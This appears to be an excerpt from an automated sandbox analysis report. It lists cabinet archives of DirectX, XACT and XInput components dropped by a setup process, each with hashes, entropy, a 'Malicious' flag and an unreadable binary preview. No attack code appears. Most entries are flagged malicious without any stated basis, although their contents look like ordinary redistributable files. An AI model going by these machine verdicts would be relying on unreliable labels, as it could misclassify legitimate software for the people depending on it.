                                                                                              Category:dropped
                                                                                              Size (bytes):701680
                                                                                              Entropy (8bit):7.9989902264021255
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SuBBWP1krfKO0BZwB6ux8hBXsRbD3RazqgwLdJPMqHy7qdXCyhUW3zE:DBTrZ0BZwV8fXsprRaxsDBHyWdXg5
                                                                                              MD5:19383CBADA5DF3662303271CC9882314
                                                                                              SHA1:123C97C33F7EF2BA345B220450F181D440412E6B
                                                                                              SHA-256:8EC971C91040618338AC2369188F3E5D7C85A5B1E3B9FC8E752DD845D295CDBA
                                                                                              SHA-512:A4C6ACC9FF656E05D75AE0081C65C200B584209C99FD001494C4D206F2CE8A78D2DD3644E51018574928F3B9E9373BF7EC8C5147A3590B54D1C6D50E61342853
                                                                                              Malicious:true
                                                                                              Preview:MSCF.... .......D...............i#.......... ....#..............1....).........6.. .d3dx10_34_x86.cat.p)...).....6.. .d3dcompiler_34.dll.h...2S.....6.. .d3dx10_34.dll.I..........6.. .d3dx10_34_x86.inf.i..........6.. .d3dx10_34_x86_xp.inf.c...L......6.. .jun2007_d3dx10_34_x86.inf.....{5..CK.|.|......m:..s66...$.\.-K2...B....-.%..\...zI....-.@...!@..<Z(.@..B..@.?..'.k.......f.67;;;;3..gQi....O.7..F....J.m........".z.=.;9.s.D........P...PV.\.U.D......M...3.{K.k>...[z.u#Q...D,..%.%.$j,@wDT..D..]................8\.S.....X*......$....q..pP>.0.8.(q.IQ..;GGq.H.@...z.F...~(...=............W...9....._A.qtt.D:[.......7D...&..N..ee.J....H..LeS,e...CY....K m..9..\....._.e....E..@R..J)p..~e...I......uA..8<>).X.#....P..O.BN...a9#I})RW..J4P./.i.'..v.Po..5.+K...[..+K..2... `]....@............q.($. <B$...8@..b<." ...b.y..,.<..OK.."*..t..q...{^..5..l........J.(Q.o.Yn.]z.:x6.T..J.Z..zG........ .W..-..l.....2.\O..f/.......TJ&W"S$*.2.@.2.a.*....C.......A...{..!.|. ....UVJ7.#.\T..k..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601814 bytes, 6 files, at 0x44 +A "d3dx9_34_x64.cat" +A "d3dx9_34.dll", flags 0x4, ID 8310, number 1, extra bytes 20 in head, 140 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1611006
                                                                                              Entropy (8bit):7.999795394912666
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:dyO6V3G0SAcId5iPNJKbtZJSlR3Q0872iOda:dyDlSA/5iPNY7Jo3GPOda
                                                                                              MD5:8DBAA3047397EE4CFCA2EFFFCC2DFBD1
                                                                                              SHA1:D88FAD72D7EAF38B8469B2B8492311C39C42BE04
                                                                                              SHA-256:FE4B15931E048C97CBBC26F753093E7D41ECCF174402542631284F8BDB9EE692
                                                                                              SHA-512:1CE01BF0BD4C0D832D95B13E958DA6CB69C0D3949B128FCF40EC59ECC0AD8989B27C91EAC28CD98777D57DFEB811CC1077FDB87348A11B6370D806771D7E742D
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....q......D...............v ...........q...#...................(.........6.. .d3dx9_34_x64.cat.h.D..(.....6.. .d3dx9_34.dll.h.....D....6.. .infinst.exe.....h.E....6.. .d3dx9_34_x64.inf.......E....6.. .d3dx9_34_x64_xp.inf.,.....E....6.. .jun2007_d3dx9_34_x64.inf.....D...[...S ..uM....5!.f...O.....c.F...7..FA,...Jtc.kn$..P..R..Z.$.J.U#!.TJR)..1.!..@C3.........=.G..{#t.,..7V.uh..8..R...9I-d.X...W.vr..V+}NjE...S...pq.l...)V..,Q6..x.Hb.>9XoA.R.=..v......`.4.3...[f)...`.../........Q..........m...{.y2.u.....m.....}2.r.nF.......c0 ...KI.&sD..YD.2.`0...&....x..~......<$bS.l...C..B...~_...~s....V....)+H..!.....G.p..1...Rn<...=.$.SY.W...=..s..{.7%-.qUs.2..IZI)_(I^.%.....0.w8..~.8.....B..b...Sh...=y3....(I]...L....iF<..{oD.......%...8..S.^.$.E..f..P.....d...l..$...O...G.G&............)I..........I.&...8&....wd.RL..B'..*..phbG..B...ED..0..8....M....N..$..*%-..u.k.KS4...Gd.Z..r...SRJI.V........&?4./)..I.|B.I.I....A...I....1..;.+...9.}.?..c...u.3.].T.~j..$1v./_
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843959 bytes, 6 files, at 0x44 "d3dx10_38.dll" "D3DCompiler_38.dll", flags 0x4, ID 8962, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):853127
                                                                                              Entropy (8bit):7.998980130768887
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:IKcIh4DqtGLRndZKm4zZTQb4BJ+gfG07QyGeZH:IKc64DgG9dIZTQb4L+GGIGeZH
                                                                                              MD5:B0E2B612DAF28B145B197A4DB0A9B721
                                                                                              SHA1:F69266E4AF3D2DE31A2A2E416F10B0F44737739A
                                                                                              SHA-256:E8DC1063C9434EED8D633741B19CDFA1889581041E2214B87B5159E3EA087F3C
                                                                                              SHA-512:6E31F18CB75CE69D291D0ABD15EDADF02C0693033351DFB2F435312A47540AA223C8176209725C14A05FA6494153A3E191B2FB7CB8C5CEE11FB42371CE67392B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................#...............#..............=....$.........8wq..d3dx10_38.dll......$.....8wq..D3DCompiler_38.dll.f(..(......8.r..d3dx10_38_x86.cat.I..........8.r..d3dx10_38_x86.inf.i..........8.r..d3dx10_38_x86_xp.inf.c...@......8.r..Jun2008_d3dx10_38_x86.inf...E7%,..CK..\.....\./BS3...$.......p.&..x"........h....J.,5.,._.e....y..-y...#.......YXPP+..y.......y....o*.&..........\....i...YQcs..u.77K.8..h......h..]L...y6.bc..S.\.Y..]..aM.iyo.Xr..2....w...^V.Y.v)..s..w..;..z...........S..WY.b...!....q..W............y.~.x...P..!z.S.....2..{W.x.tJ.....Y....'o5"dE...(...|o.U'.tpJ....8..4.j.vT.+TrVWy.`.P..{![...O.<.!...F...V.........C.k.E.h._..AM..+...E.jG.U.R.F:.].E...Xvw.?....'..,....................A-p...l.[.J....4.. .$.,...`2X.W.c..=Y.>........i.....A-p.?.....`.8..qp.`...A.....P_1.....? ]O....A?P.&........%..c. ..v...,h.=...AK0........k......d..... ....A{....... .|o......&..|......0........d.....[m......X...%C.D.2X.....'&.4..@o......98.~..c
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 925511 bytes, 5 files, at 0x44 "D3DCompiler_43.dll" "D3DCompiler_43_x86.cat", flags 0x4, ID 10023, number 1, extra bytes 20 in head, 65 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):934679
                                                                                              Entropy (8bit):7.998315243107519
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:pOWjUzqd7URYQio4yGDUATxoWDYicd3qRbmXHphTheb:ptx6RYQiL1DUA7EicSbUJhIb
                                                                                              MD5:E7DFA140CB0AE502048ECDF1E42360E6
                                                                                              SHA1:4DB08318F78F076FCC6FF29737B3D6D676F59C54
                                                                                              SHA-256:293CED557AD732ABD2737333DF39B08216F31601D7AB65B743FE51B4EFB8B6F0
                                                                                              SHA-512:39B69A5CC4A50DE72D031C41879ED7644B577A9E3E3B44BFECC61D5312C7C32C964DC2CD37DB711F7E486F444CA77FE732C642F3E494E6DA1BC1CF774D9EF75C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....G.......D...............''..........G....#..............A...h# ........<!]..D3DCompiler_43.dll.....h# ....<B'..D3DCompiler_43_x86.cat.!....= ....<.&..D3DCompiler_43_x86.inf.<....A ....<.&..D3DCompiler_43_x86_xp.inf.....QC ....<.&..JUN2010_D3DCompiler_43_x86.inf.W...P!..CK.[{|[.}?.J..'r.$...k.I........;/.`HZBG.e..V.....C....e@..i.%.@C.:.e..2F..t..A...n.i..e..F...s.W..,.l.g...7.{~.....y.k....`...06..1._.l...af..3..S^.<&my.r[. .h.p_.;....P8...J$.R.!...@.:g.Z.......;...s.}.m.....)...U.....4.H..m....u.]s......A.....d.]..."YYK.....&WN..2v..._........*.?vq/3fc.@^.XSD.zD.:.K.a.Mt..........r...LT...C1.+........s..(d.,G.O.l..:y\.X..S.bD.. /..5S.2.v..1/...<r_G.b6^..3....^.@.._5.f.vgD..I..gznTl...[w......p.y[....u...B...v..........&.%..].u.:....}...{..".)..........;......*B1.Jx.b9I8Ax.p.p.PF...........F.".".....|.^%.Hx....;.#.{.......1..B7a.a....$T.J.3.V....=..7./......%<F8B...v.....C.N.$<Hy|.p....Y..W.'.....\i..J(&(.%.....0.S.=y_..........F..[Jp.1......(-.....
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 762076 bytes, 5 files, at 0x44 "d3dx9_43.dll" "d3dx9_43_x86.cat", flags 0x4, ID 7093, number 1, extra bytes 20 in head, 62 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):771244
                                                                                              Entropy (8bit):7.999380380890997
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:E0b5pTUIVIRxV+yb+HJFnXQRGr85UpzQ3VztxmHN8DMFy0BJ1lSIug3SqHAlzJYf:l51NVO+XVLs3VztQHmYjBJb931I1NYI0
                                                                                              MD5:BF124B64FC3774F61D30DE0A405F0C6C
                                                                                              SHA1:2F8A8BABFA4E51555FCF125E8373D9C5F7F7434A
                                                                                              SHA-256:457C5CE48EAA0FE551B46DFFC1E4DCA985D261686D8D4E6BCED533EE1F682FCE
                                                                                              SHA-512:935922CE74BD399E8358693562F86C9B4B6308A6E33586A5DD61924F8B6B2CFD6CB2E472FD082B9EA32C0ABB9A799A0BA9103B4C316342F8072A7A3782C2116C
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D...............................#..............>...X}.........<!]..d3dx9_43.dll.....X}.....<C'..d3dx9_43_x86.cat...........<.&..d3dx9_43_x86.inf.,.........<.&..d3dx9_43_x86_xp.inf.\..........<.&..JUN2010_d3dx9_43_x86.inf.[.'.":..[.... .......5!.P..wOnf..O..........9vm..o..f.6.....+I).H]..t.....T...v.!..M.......>>.{..._..t....g...:..jh.N....K...vJ.r.. ....;J.zq.....*....H....'....d.=...{O.4.xIBC..L7..2....... ..E5`5`........<s...9..(.b3. .."t....M\.;...0......*...H....K.5$...L.Ha....%..e..V........{.t....#3kk.sR6.....I.u.Em....b.Dl'.E.[.D.N....m53%...'.m;.>..yf.6..pN..N.y...-.5Y...f.......-.B#.......;.D]......G.8.5...*G.......x..}...!.GwT.......WwKuT...Y.l[f..}ji...{.h{...x.u.....>..1....k..v.D."W..ZA..<...7=c2QN.Y.......v..k&aHudg.W...`HbV{.Q..CJk..nLpw..#.&5.%S...G.&.`....]...EpFY...(....P\..+/`..&..ap....S....BR..'....s..c........p..B..j*....c..D....mU.x....N.r..QfEz`...}.._...........8..$..........!.G...i.@..P...."c..d.L00...QX.B0.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 797924 bytes, 6 files, at 0x44 +A "d3dx10_36_x86.cat" +A "d3dcompiler_36.dll", flags 0x4, ID 9083, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):807092
                                                                                              Entropy (8bit):7.998858073625772
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:EL+Y8gC2xQcaINcDDHwNXjNOl93uN850V7ZcR0SEDR3l3M:vD2xaINcDHIzhs0Vwz6c
                                                                                              MD5:3D9A0C59156D03DA0F19C2440E695637
                                                                                              SHA1:55B050991CB17410C75ADC3913066BAEDB482ED0
                                                                                              SHA-256:BDF7FB01C02783A4F8C9F5E7911F5CAE3E2A7CBC425B90B36F9EA6EEF2C27DE3
                                                                                              SHA-512:E9A662498C43865E917F0778B772D6964517E41289CBF5A0B8A4E44D8C4B4E9A5049C76F2ECBE4ACC7E9CFCC3F1D87A75C3F8703E66804CE758969814BA14FDA
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....,......D...............{#...........,...#..............8...h(........V7.. .d3dx10_36_x86.cat.....h(....L7.y .d3dcompiler_36.dll.h.... ....B7.O .d3dx10_36.dll.I.........V7P. .d3dx10_36_x86.inf.i...1.....V7P. .d3dx10_36_x86_xp.inf.c.........V7P. .nov2007_d3dx10_36_x86.inf..d.....CK..8.....Y..^(4cK.......H....0..F.]1..$.(W...P.-..J.).[*.%Q....M.v......>Os.c.......=.|.}..d*.r.5....q.s.J..*k8....y89....e...D...Q.!aL./,..l...@~N..J~..)...=..].)......o.@.... ......,R...".@&L.i..........Z.6`..C.......]6.Z.._V..J T.B......l......,..t.6.....md.p..5...l.....B...aI,.F.mU..<T...@Hf.......d{..... ..1.0$.....j.AE..#'..'.%..%....4..p..P.g%..(.H..d..........R#..L..H. mXq..c......6tU$....cii.e............1dA...f.... .........U.B..b.....Fj.z;x...f2. gY.....9.u24. .O&....!E-.....R.d+...5.b..![.dG.....""{U.C...........9p.M....Y|.\f......E....).J...d..0.l.A......0$.....}....e......t..^W..LM(.$,... +.....A..K...f.p..dD...,..E2n..2/k-...d.E2.-.@.S...1.........pA..H..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 959461 bytes, 6 files, at 0x44 "d3dx10_40.dll" "D3DCompiler_40.dll", flags 0x4, ID 8926, number 1, extra bytes 20 in head, 77 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):968629
                                                                                              Entropy (8bit):7.999011847061652
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JKTxCzc8gSDnU8Hz10a0s65QckarHGlImJtXn+QbtU0sHsqzn:mxCzs29r0WQma69nBbtU0sjzn
                                                                                              MD5:5DFEB46E60795266DA03F2D0A67E7ACD
                                                                                              SHA1:A77758873E5544E8AD22ACF469C4A0FD0C944A88
                                                                                              SHA-256:EC52B075A3E9C7FE468B317E0FF977964B1003D560065128741F4392BF47C49A
                                                                                              SHA-512:6EC058811AC017BE3CD3A46559CD73126666F41B0FA58D92C1168CF2A2E0E2357B19F65531C786EC81A438975DBECE440C5E7B6C653AFA5428CE6C444179AF6C
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D................"..............#..............M...X.........O9.2..d3dx10_40.dll.`...X.....O9.2..D3DCompiler_40.dll.......%...O9p:..d3dx10_40_x86.cat.I...g.&...O9h8..d3dx10_40_x86.inf.i.....&...O9h8..d3dx10_40_x86_xp.inf.c.... &...O9h8..Nov2008_d3dx10_40_x86.inf....X.0..CK..T...{..J........D...$.....$.2.....&L+...u..Q.5#f...W].9cN...w..Qd...y.......9~.}..]u+tOMM...r.].a.O..f7#.\........m.l._a.[..,4Q.&KU...c.eq1))*.,V!S...)2...Y.*^a.Q..b........y_x.W..Q^J^.j..P..gB.*..<w....E_).$j..q.|y..{.'....1V-..N.bt..%...A.0K....u...O...K.u.F.H(u>.X.vbd.......)..Ltg)c.a..J..|.V).N.F`G.Lxk..Rf.-.<1b...0..y...*y!.g..F1Z.v..T..o......i.............!Jku.:..i...e.....Z.HR.0...6.....zk1..._.-.L....a).Gx.).........@6...........P.\....?`.....f...|.r......L9......S.T ........o:J.'.E`?..x..?...$........z.......,.<.'..D.j .....G...3...G;.......p...&@W...;....^........R .X.....L ............-...........'.r`7........)........=......r..j,e..j.)..........uX)..p.B...
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1406942 bytes, 5 files, at 0x44 +A "d3dx9_31_x64.cat" +A "d3dx9_31.dll", flags 0x4, ID 6653, number 1, extra bytes 20 in head, 124 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1416110
                                                                                              Entropy (8bit):7.999689455720137
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:DapRo0d7USayTXsV6ZMwksqb7CL7eRS3OnQdPIKoQZvkGVOxtWcjxWO3ehFWG492:DU+0wyTXsMiw+OORhQRdZLdc1BehFV4g
                                                                                              MD5:EDBA7BC2A22F3186420C271B7291DCA3
                                                                                              SHA1:65483DB4269BE348528FD205239B811D775421CA
                                                                                              SHA-256:4F5CFFA56FD44F7775F12FC511A1E3F030C05AC78484F6866B12B82979067C22
                                                                                              SHA-512:90A9FDAD3D7F933DA8C3731E42D262034907D8088B85D7100BE46C57DEF02B436C31EB9FF144B9D67FD931F92A1677EC0CD762D9AAF066BB026F139499BA3A66
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....w......D............................w...#..............|.............<5m. .d3dx9_31_x64.cat...<.......<5.. .d3dx9_31.dll.......<...<5.. .infinst.exe.....'.=...<5.. .d3dx9_31_x64.inf.&.....=...<5.. .oct2006_d3dx9_31_x64.inf...l.9..[.... .......$a.V...>.H.!D;..mw.U............u..J..kAE.-....Z..-..kZ..FFf.........w.......Z...UpO..\.>?D.uJ;..nq.....w.........6.......|.G&U....Z.*U!cZF.A!..&R.$......u........[(o.o..{...yr.0c..*R..:.*.&...b....?P.i....._..\....w..4z....)..z...d:..B.'|/....O.j..h..............G1.....|^l...2..'.J0*AT.H"..T...@].....|,.....;..9.RL...r...Z...}.....\j..*.UGZK.\ .t..K.-.... $.r.5...e...#...9@..%.X..`s.........o..O.`..5.&...........w.....P/;~ZA~&..D..Ao.z...GW.......$..+......_.R{...C....#?..5.`.....-.y.o/.a.[....[..x._.s....x9.~.N..|.kyU.............o.. .S...f...i....3...(,..SyKM1kdv...q.b<...e.{..K.....F...Z..d(s.....1.......v..K.H=H..%...=...~..m}.C......|..h.UV../.H+HS|...{.<...Q...3.P.U...Z.....O1>.:X.p..5
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 91192 bytes, 3 files, at 0x44 "dxupdate.dll" "dxupdate.inf", flags 0x4, ID 3666, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100360
                                                                                              Entropy (8bit):7.9900557178400815
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:lvknxJpNYAzRstaRkz0BwwnNbSa+vp5647S:FkZNXsERk6wwBSa+vnl2
                                                                                              MD5:4AFD7F5C0574A0EFD163740ECB142011
                                                                                              SHA1:3EBCA5343804FE94D50026DA91647442DA084302
                                                                                              SHA-256:6E39B3FDB6722EA8AA0DC8F46AE0D8BD6496DD0F5F56BAC618A0A7DD22D6CFB2
                                                                                              SHA-512:6F974ACEC7D6C1B6A423B28810B0840E77A9F9C1F9632C5CBA875BD895E076C7E03112285635CF633C2FA9A4D4E2F4A57437AE8DF88A7882184FF6685EE15F3F
                                                                                              Malicious:true
                                                                                              Preview:MSCF....8d......D...............R...........8d...#............................~>.%..dxupdate.dll.02........h=...dxupdate.inf.1...0.....~>.%..dxupdate.cif.T....'..CK.Z}.$.U....;..@.e!.#....G===.=+".?..+.s..l8....o.{....;.+..(...d,..HVd..,......(..[&H.........Y.Y..~..{.gv.vW.'.....^......^...}...1v....2.*.~.......y...a_.....^Z..V?H.Q..bo(..0.Ra...q(..`o....W.....4~...q.?...F.............].....~c...O7^..W..x.?...l.=.~$......'..o;.._.....'u.aK......=..X.........g........~.].[..+..\b._........p.=.....w...%..@.o-.....O2..w...~sn..D_:....G).../e.Q_/....=Y.x........p.0..^....w...A}..'..... ...P.7....3.av...?...Kl.......>t...O`..b.]....x..Y....._...x..}....@.....1.9.o....[.?.......)...g..'.1.i../.^.|..=........x...L.6`...>..,...K./....6...........A.#.?.8.|....?.|......w%K.>@..(.I...9.../....].....%v7.>.....-@.p....E........6...Kc..p?@.....8.|.p/..xg...7...^.(..7..X~?..........#...w...q..U....f.... ..?<.\...}.K.Z.,]+...../..-......e...aO....a9Y......Wg.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 145265 bytes, 6 files, at 0x44 +A "xact2_7_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 9001, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):154433
                                                                                              Entropy (8bit):7.994491966822324
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:BcJ4S2kOBrMASnHr7M58QmpeFT7582Skd1ksaIwbhQDp9kkIFxYJQZW9379+:BQ4S2kOi/MKbSV82xKnDVQ/EqQZa3k
                                                                                              MD5:8922189C0A46D26B2C52C65515D87180
                                                                                              SHA1:27830C01AFB15158186A045B7224EF33793AD211
                                                                                              SHA-256:39F970BF4CC42E9325ADA84A603C6C691BF94921385A52325F402F7432ACE697
                                                                                              SHA-512:53D51CAA2CF448681A709F2B9737EF75DEA4E9A46E2B29E6588B13E941671643A64D3597649AA2AE0B1FE9E5D591ED00BAD9FF3344CA62851E03A68279142CAB
                                                                                              Malicious:true
                                                                                              Preview:MSCF....q7......D...............)#..........q7...#...................).........6.. .xact2_7_x86.cat..;...)....e6Ie .x3daudio1_1.dll.h....d.....6.. .xactengine2_7.dll.o...Bb.....6D. .apr2007_xact_x86.inf......h.....6D. .xact2_7_x86.inf.....:l.....6D. .xact2_7_x86_xp.inf..IL..9..CK..8.....Y.$K%;..93..E.R....cd.....lm.*..5!Zme..!.)e.}.$)....f...z....^]W.\.s.....~~.=....*n.E1.1.P<.t..3.)..B....7....Z...,l.7.*7..b..Q.,l.l....._..Q(.....n....ys..g....D@.Z..........Z1A..R......F.,:.[&"Z....E..rzH...1..)..#..L....p......C...6..z;4....dW"....]...&PR...^.p.0..U...[.a.@...9<.......F..@...h........a..As...g.FJ#.....@...d.BA......0..Xq.7o.-.....S9.....;_....L..x...3`......v..el........./....L9...K..=u^.-s..R...N.>84.~...=%..cG....Mh.....sd3xfG...JsN...6.'.....)./1...S..7....@mZ.....7...W..'..wY.US[Y...`..&'..9.~^.-h..a1.Y(.0?M.].NG.H..@..:......&4v&.Aa..N..~3Z..d.9.....H....x..`.s..L;..f.7jB@.Tc..}.....A%..Ej...&..!_d.i2q..3M........(`.?.c.(4Z..Av...4........?..B
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 47342 bytes, 5 files, at 0x44 +A "xinput1_3_x86.cat" +A "xinput1_3.dll", flags 0x4, ID 8235, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):56510
                                                                                              Entropy (8bit):7.973777529821975
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:BcnwcwzHEdb27WH2SfZDNu75ddnVR+ZFaNk0ZKn4:4wb+2eZonQwt
                                                                                              MD5:B362EC93463D8B6381A864D35D38C512
                                                                                              SHA1:7CE47EBCEDA117D8B9748B5B2D3A6AE99FC239DF
                                                                                              SHA-256:B6C1166C57D91AFEEEAA745238D0D6465FF2084F0606FD29FAF1BFA9E008A6C5
                                                                                              SHA-512:CC57733912E2A296A11CD078372C3B43F1256A93EC5BECD0D1B520EB210FCE60938AA1CAA6DBBCA03292A05495B5ECD212EE5F77E3EBABB11EF31F1975B2D09E
                                                                                              Malicious:false
                                                                                              Preview:MSCF...........D...............+ ..............#...................(.........6{. .xinput1_3_x86.cat.h?...(.....6.. .xinput1_3.dll......h.....6G. .apr2007_xinput_x86.inf......m.....6G. .xinput1_3_x86.inf./....p.....6G. .xinput1_3_x86_xp.inf.i...T5..CK.y<.....Y.d..H.<3.1....=...`,cbB.f...*R*kB..V..E...,.[$I.R(~g..n........}....<....y>.9.s.....f*&.s)E.F..Cp ..Q...D 0<0.;....R.....3.\...4...F.1QI...........@..O....2.f....I\...a...c4.0.....,...0.!..6.. M...@..:..ocp.A.K6......... .F..!...[....+..,...0n...<..@cl`+Xe^.X.t.$.;{X@.P....@d..N=.....Z..g....&...#...%]....~.........C. #..u...h(.4^.4.... a.a...*#.Z<....%.{..5..n$....P@[..C<01..Y...F.\..[.H.H.l..f.l.X.0...l.4.A....+B.~.|.l.YO0..k}i>~V..O.f...M0n^.?..B..........a.......N.w/==J.{..D@0..Q.....%..@6..Z.|......@@.4..a.....q......t....4v....dI.Ym..^...........[7.XH.8Y.nR..d.<.;O.."k...d.y2aV..4....D...5..B".H~.....+x_o.4....c.#.`..0...v.F4........I.Q$.....x....._..;]...O[....l....?..:.......Q._....2.;.~...NXz
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1341394 bytes, 5 files, at 0x44 +A "d3dx9_25_x64.cat" +A "d3dx9_25.dll", flags 0x4, ID 6661, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1350562
                                                                                              Entropy (8bit):7.999714569554039
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:qc+wdspnWpjnrcf+FH+guUawET50xShS+KMMMBNNxjUBH/0ghOw5b:r+AspngnK1TDhS+jMMBN3jeHLhOE
                                                                                              MD5:E961A77647E7FC2597A68FF572F730E1
                                                                                              SHA1:976D1CDE1EC28A4992E1CBC345637447115F14C8
                                                                                              SHA-256:A239E99D02FBFC9D30D5B705AA743FC070386FAEA1A66B3D67099AB446568A12
                                                                                              SHA-512:CF72AE18E99942D959BCE58678F544A10C98802D919ADC30737389D6CC0D492F8D7902E0E2CD04501FE6429B96C782649658D2D35C879A202C23E88570A15B94
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....w......D............................w...#..............w...7.........r2. .d3dx9_25_x64.cat..V:.7.....r2|. .d3dx9_25.dll......t:...r2X. .infinst.exe.&....V;...r2.. .apr2005_d3dx9_25_x64.inf......Y;...r2-. .d3dx9_25_x64.inf..q...9..[.... .cm......R.P...OB.."..AI5.]..."..UL.F.$.T.S*..iR..rJA.O9N/..jGJ.........\..=.....z.....5L..9.SA/&..,;e.l.@...C..Y..z...a}M...d..qh...:.'..@...o............T.{7..s.d1".........Y.*./.z..7(....N.k...,3...).h.>X..X...l.....A\p[....`y.......G..^d.c".j..k.....M...].ef.@..c...-.!.%O3.<G..B.y..A,.B..G%0..K...J...XX.Ig.|=.. ....#.t..>.#....S...^@..@.^m..@.l.....zI...y...L.Q.C.....x.[W..y..Z...o^.].G...G..4.q........o.xQA.....O...&B..s!......=Ovrtq.X.-}.u,k..:ju&m,$.5.V.T.z%......\.G.Dx...~-W.......... X.>.L...I.y?.f.1....4..J.b....%.e.t..U....o(..A...o.?.X..._?......).$.k.#..5o.>..&.0..a....8k....&E......$...Y..q.Y.....O...?...}}=.]'7.Knw....@.n.../.....".....RB.tg.._..Se'2.B)........6..p.K=......fz...z......I..y..uA
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1109261 bytes, 5 files, at 0x44 +A "d3dx9_30_x86.cat" +A "d3dx9_30.dll", flags 0x4, ID 6903, number 1, extra bytes 20 in head, 74 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1118429
                                                                                              Entropy (8bit):7.999050518080374
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:OreyPa6AC8e290lruGDhi3TSvHDh+ISNvRNhPmJ0RRuu:cNoeYEuTSvjh+R3WKRv
                                                                                              MD5:B3D644A116C54AFDA42A61B0058BE112
                                                                                              SHA1:9AF7DDC29EEF98810A1A2F85DB0B19B2EC771437
                                                                                              SHA-256:CA7B9C6A49E986C350147F00A6C95C5B577847B5667B75681A1EE15E3A189106
                                                                                              SHA-512:A2D2F12B7B37BD8F5C8465DD13AD31942DF11EE5ED5423DEEEB178E6B594587706D2C5116258BE1562CAA5ECA691358AF3CB83B77898D1012FF521017D199165
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............J..............44f .d3dx9_30_x86.cat..p$........4.e .d3dx9_30.dll......$....4.e .apr2006_d3dx9_30_x86.inf.....z.$....4.e .d3dx9_30_w9x.inf.....+.$....4.e .d3dx9_30_x86.inf.v..[>..CK..X.K..=.. ....+..MBI.. M@.n..QH0....#....c..b/..{.z....E..y.......N8?gg..{..=..{...W..;..:....IA.....a.`.......43GX..r..,.f...+FA..,.....2..a0..2......Z.ty.Ih...m0w..es0Ww.[/.n%q.Z.I...ho......#...G.....\.. 1.P6....;.s.cZ.......t.B...X...LL..X.C.......B.......~......@..!..8..O..O..!mR..fbb.0.8L.f..XO.R.-......Y...y...Q4."5JD...p..s.T.f.2z.6..~...........9VPR.f.BH=.bg.s,.T.!=......O..........B...||}...X..5]R.0.....c.+.4..S....E.7.y...[....3...2$..:qt...7T......Q..@X..Ji...q.Z8.Ea(..@zS.D.3;.b..a.}L.;..PG/-....(...../vL_...@K....c..&....f..y.....3.8fW:.T:N7..W:..t.t...#(.FK.k..X..&...;_...Be.w.....b6.z<..za..}_7.afQ......O{,..Thu...).'+..0{:.V}kI.&Z.JU&&*...B..[.'..t.vK.9.`]..!.)Vht.8e.\.T.....i......I.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
